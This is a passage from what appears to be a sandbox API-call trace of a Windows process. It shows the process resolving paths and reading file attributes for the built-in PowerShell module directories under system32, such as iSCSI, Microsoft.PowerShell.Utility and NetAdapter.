fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0332.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x39, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0332.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0332.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0332.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00bc16c, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xf00bc16c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0332.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0332.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0332.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0332.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0332.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0332.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0332.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0332.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", nBufferLength=0x56, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts", lpFilePart=0x0) returned 0x55 [0332.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0332.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0332.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.107] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0332.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0332.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.108] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0332.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0332.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fe8680, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0332.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0332.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0332.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0332.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent", nBufferLength=0x3b, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0332.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0332.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x39, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0332.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0332.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0332.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0332.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x41, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0332.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0332.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x49, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0332.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0332.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x3b, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0332.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0332.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x3a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0332.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat" (normalized: 